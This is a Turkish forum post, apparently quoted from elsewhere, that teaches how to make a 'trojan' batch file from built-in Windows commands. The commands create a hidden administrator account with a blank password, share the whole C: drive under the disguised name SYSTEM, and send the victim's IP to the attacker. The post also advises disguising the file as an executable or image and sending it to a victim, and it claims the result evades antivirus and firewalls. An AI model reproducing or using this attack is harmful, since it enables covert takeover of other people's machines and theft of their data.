Ewet arkadaslar, konunun basligindan da anlayabileceginiz
gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan
yapmayi size kisaca anlatacagim;
Trojanin ana amaci, adindan da
anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir.
Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir
harekettir
Piyasada bu konuda son derece fonksiyonel bircok Trojan var
fakat bu trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda
da sonuna kadar haklidirlar, Trojanlarin Special Edition olan versiyonlarinin
disindaki tüm Public versiyonlari maalesef AV lerce taninmakta ve hepsinden
önemlisi Firewallar tarafindan bloke edilmektedirler ve bu da kullanicilarin
isini oldukca zorlastirmaktadir.
Size simdi anlatacagim yöntem, biraz
mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir
toola ihtiyaciniz yoktur.
Simdi Trojanimizi hazirlamaya
baslayalim;
1-) Öncelikle bir TXT dosyasi acin ve icine su komutu
girin;
net user HACK /add
Bu komut sayesinde kurbanin makinasinda
"HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi
icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya
geciyoruz;
2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve
su komutu ekleyin;
net localgroup administrators HACK /add
Böylece
"HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik
"HACK" hesabimiz tüm yetkilere sahip.
3-) Simdi de kurbanimizin
makinasindaki C:\ sürücüsünü sınırsız paylasima acacagiz. Kurbani da
huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin
asagidaki komutu kullanacagiz;
net share system=C:\
/unlimited
Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki
kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK"
hesabindan baglanacagiz?
Bunun icin de kodumuza bir satirlik bir komut
daha ekleyecegiz;
4-) NET SEND komutunu kullanarak kurbanin bize
Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize
söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine
ekleyin;
net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin
kurbaninim Gel bana baglan
Unutmayin 82. li baslayan IP adresi yerine
kendi IP nizi yazin.
4-) Son olarak ufak bir önlem alacagiz. Peki nedir
bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette
ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde
Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut
satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable
bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman
Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve
calismayan Messenger servisini calistiracagiz.
Öncelikle Administrative
Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod
icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi
kullanarak bu servisi calistiriyoruz.
net start Messenger
Size
tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardisik sirada
önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir.
Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi
olur.
Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir
isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile
birlestirin isterseniz kurbaniniza direk gönderin.
Kurbaniniz bu dosyayi
calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak
ve sifresi de blank yani bos olacaktir. C:\ sürücüsü de full olarak paylasima
acilmis olacak ve son olarak da IP si size gelecektir.
Artik IP sini de
bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina
baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir
program ile paylasima actirdiginiz C:\ sürücüsüne sizar istediginizi
yaparsiniz.
Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen
Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni
ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak
baglandiginiz icin hicbir personal firewall tarafindan
engellenmemesidir.
alıntıdır
hadi ama birileri cevap yazsın
artık